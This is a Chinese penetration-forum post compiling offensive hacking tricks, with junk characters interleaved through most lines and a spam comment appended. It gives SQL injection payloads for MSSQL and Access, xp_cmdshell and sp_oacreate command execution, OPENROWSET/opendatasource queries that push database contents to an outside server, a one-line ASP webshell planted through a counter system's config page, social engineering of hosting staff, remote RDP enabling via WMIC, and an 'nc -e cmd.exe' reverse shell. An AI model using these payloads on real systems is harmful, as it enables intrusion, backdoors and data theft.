中国网络渗透测试联盟

标题: 站库分离的方法 [打印本页]

作者: admin    时间: 2012-9-15 14:41
标题: 站库分离的方法
SA点数据库分离技术相关
7 W$ j$ M/ R/ Y+ S% r. {
6 v/ z4 i' p; G! {. M# \  T- q8 X4 u/ v
SA点数据库分离搞法+语句:
2 _* l$ M; @; _
) R6 L, k; \. W注射点不显错,执行下面三条语句页面都返回正常。! j, M1 W. m3 y! t: [0 u1 E0 B/ t8 `" R
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')0 G! j6 M: l6 w; S' `6 B+ Y- \6 k
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
5 e3 f' T- s, U7 S& G% C. mand 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')$ {7 F. v. F) @! b# F
可以列目录,判断系统为2000,web与数据库分离/ B( E/ x2 ]- I! v+ _5 W
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。; i& e( @* B' J( |: W6 j
在注射点上执行
6 `# m2 `! @7 R; k% g3 ~& O- pdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--& }5 O5 j' b' w
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP  v% X, d* |7 W9 ]: n6 O- |; X8 f
还有我用NC监听得其他端口都没有得到IP。4 U# {* H0 c# U3 p% T
% U8 J: X) e1 ?4 N
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
. n/ k& V4 T4 _0 N8 G: P3 I8 [! z'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--
* b3 {$ `$ U) x$ o' t+ N: V
& U$ P, q- F2 |;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
$ p1 J' B6 Y% [& \5 @0 \5 b8 ~# z; u/ S2 C9 {
现在就猜想是不是数据库是内网而且不能连外网。
2 v! a; J, Y7 J6 l* L, w) x& M0 k- F
; Z4 d1 R, k5 M- A3 A3 m% G
access导出txt文本代码
. n+ [7 B9 t0 k6 z$ R, ZSELECT * into [test.txt] in 'd:\web\' 'text;' from admin
; Q1 M" q, j  Z5 z
( I3 R+ V* w) ?3 Q, ]( B) q# I! X2 Q) |  t# ~4 l

( Y  d" V4 o" s! V  x' q3 v自动跳转到指定网站代码头) j& `6 C3 D8 Q$ `$ a
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
/ T+ W! i5 j( U) y* M
4 m4 D1 R# J$ Y  E& p
6 p4 k  D: W) l4 E8 e/ R入侵java or jsp站点时默认配置文件路径:$ `- J2 v1 C" I9 _8 t" b
\web-inf\web.xml
* |0 }  m( s# y$ C  S9 Ytomcat下的配置文件位置:7 L, I8 R" K  U; ~- }
\conf\server.xml            (前面加上tomcat路径)
. ~( R& E: Q1 w1 E5 k" j. |, r7 Z\Tomcat 5.0\webapps\root\web-inf\struts-config.xml3 [3 r, o2 U. q4 {- s- |  l
6 h+ i7 w" v1 ^
& b8 b2 c6 p2 Z

8 M  b% B' h$ t1 Y; }检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
. X+ T. ^7 D# `( n5 j/ i! H$ K-1%23
) t! F$ p2 k$ Q* P: Z3 _& N>
6 c% V0 r9 S5 l( T) y* u<1 W* G6 ~0 o4 e
1'+or+'1'='1
" {9 A5 M7 V; c2 fid=8%bf
$ x) x+ ?, b; Z4 _% o+ w  D- T. q  }7 @- r9 Q
全新注入点检测试法:
* B2 ?* X1 t) H2 ~1 O  z) I' G在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。# r1 V/ b0 R% [, y/ B9 }

: O" B1 {0 R- p$ Z1 D在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。
1 _. ~8 ~  p6 ^9 M" f
( z0 L7 o$ V  ^) F% a' g$ u4 R搜索型注入判断方法:
% A5 {* E- Y4 l- L* e2 y北京%' and '1'='1' and '%'='" n2 Y  B" l) j/ U: K8 U) m6 A
北京%' and '1'='2' and '%'='
& P5 V7 f; E7 @2 M( V' ]
. y5 `6 ~+ H# D$ H! O
4 O3 e5 r9 ?2 m# F# hCOOKIES注入:# \+ `2 v" ^+ t5 h3 P
1 D' ^( I; V- P- U
javascript:alert(document.cookie="id="+escape("51 and 1=1"));9 X6 }# L, ?0 d( v0 l5 g  ]
* }6 a4 j: |9 D' I4 d
2000专业版查看本地登录用户命令:
9 @: J8 b7 b( ~' @7 p3 dnet config workstation
1 p5 n; t5 X) i
/ d0 k2 [1 T  F1 q
4 A' K& e$ A6 s$ k; y, [2003下查看ipsec配置和默认防火墙配置命令:
: E/ s* g: g# D& u9 j4 S# nnetsh firewall show config4 ]6 D, _% L+ Q7 n, j( l  y; j
netsh ipsec static show all
7 k# t9 k3 E) o* N3 v/ Y9 @* [0 ]) X
不指派指定策略命令:. ?3 @0 h, c9 d4 Q4 `
netsh ipsec static set policy name=test assign=n  (test是不指派的策略名)/ j8 c5 @+ @  [. F/ g+ E1 _' h
netsh ipsec static show policy all  显示策略名$ C$ \* v! H1 w5 z: m- G$ j3 [0 Q
8 B8 r, Y5 J, t

/ s9 c# M, X: i1 ]! l* A猜管理员后台小技巧:8 ]4 U! K7 k( a' A
admin/left.asp 1 N! [" A# J+ ]; @4 y7 B& y
admin/main.asp
( _# x, u9 b! g# x8 E! p$ p! madmin/top.asp
( m4 T& f. \* ]( }admin/admin.asp
* t7 s- s& b, O% q, ?会现出菜单导航,然后迅雷下载全部链接' |# K3 `5 Q1 z( O" S3 \; V) W4 ]
* X, S1 t5 b# [1 l8 T/ D

) l. _+ `7 i% O/ @社会工程学:% n$ `# F& k- o" m- M
用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人: l& n+ Q7 f; m" b! H
然后去骗客服  i. t$ b8 n0 Q7 U7 X$ Z; p  x, u
& E) q3 F- Z$ Q3 I6 d

% [  K0 G, r4 }7 t0 d& N统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码:
7 }) A6 v* W8 Q0 i' R3 ~! E查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
5 |# C6 N0 G/ F8 A) o" S  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。9 F8 G7 c$ c* J3 V7 {0 i$ [& k
6 A7 B  t) D7 y$ J+ ^. v% \5 G( p

0 P0 G( B9 W! B! T3 {
0 p% N, J6 M+ V% I' \5 |6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)
' Q1 N, p6 u0 `# x% [# f% L$ B
! Q8 r: e* @  U. C* B" Y6 p' ^# n# b
) u& t3 I! K$ N' X: W
CMD加密注册表位置& ~; e5 C' Y5 a
(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor
+ ~+ ]: y9 W+ X: f7 J4 w3 QAutoRun
- q0 b& q% ?. |+ L9 X9 G% H# k# E" i& L4 \
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor3 R) {; L5 T$ u) {& O  X+ p
AutoRun3 H' [& H0 a9 n$ D, Z. o+ M
9 D3 A  P3 E4 `" c

" a* s, U& X' a7 S. e在找注入时搜索Hidden,把他改成test! U3 @' g% x8 J  y, w: A/ H

0 H$ D- v) u) F% N7 P9 b/ @5 u) y
/ P) I! n' r5 t2 A# ?$ D4 ~5 ^/ Y  h+ J( ?* Z9 Y) o" Q5 [& }. D
mstsc /v:IP /console
. R+ [" g0 S1 V  e/ b) |  M1 ^# l3 N5 Q; ^9 x! W
. b8 W) ?6 b- x
一句话开3389:
# t" A5 y' F4 t. D! E1 c
- B' c- I% h! Z# y9 M, p最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  
, q3 {2 t6 v) V- l- `4 x开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了./ y  t( `) r1 K+ R$ y+ F; |

3 Y% u3 ~( @9 e$ s0 W3 a  `  s2 ^" v0 S; H/ ~7 C0 r
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:( ^8 i. F/ T  {7 o
Insert into admin(user,pwd) values('test','test')
, S1 T! K1 s8 J; D& J% G
1 _# @  T8 L) P3 b8 Y9 A, _* h6 G' T3 |$ t
NC反弹
: Y8 w; v1 ]7 ~2 w) n1 D) h先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   % i# g$ I- ~# e+ x) h" J+ T2 D
然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)9 J' X1 }, w$ H/ O0 I) t  n+ g
6 ~9 b" d( v1 @. N- k) u: U6 L2 r
9 @: r5 h% p. U7 `& k2 v+ d
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
' F. f0 d  e. Y, b: t8 J/ I5 t( {. w  c4 |7 M' y. V; Z- ]
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录
9 G( W& ~/ P5 f! _例如:# g' z* L+ `; |7 I% [- Q
subst k: d:\www\ 用d盘www目录替代k盘, l  c3 G# q& W- j# {6 V4 H
subst k: /d  解除K盘代替
作者: 匿名    时间: 2017-12-20 02:36
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2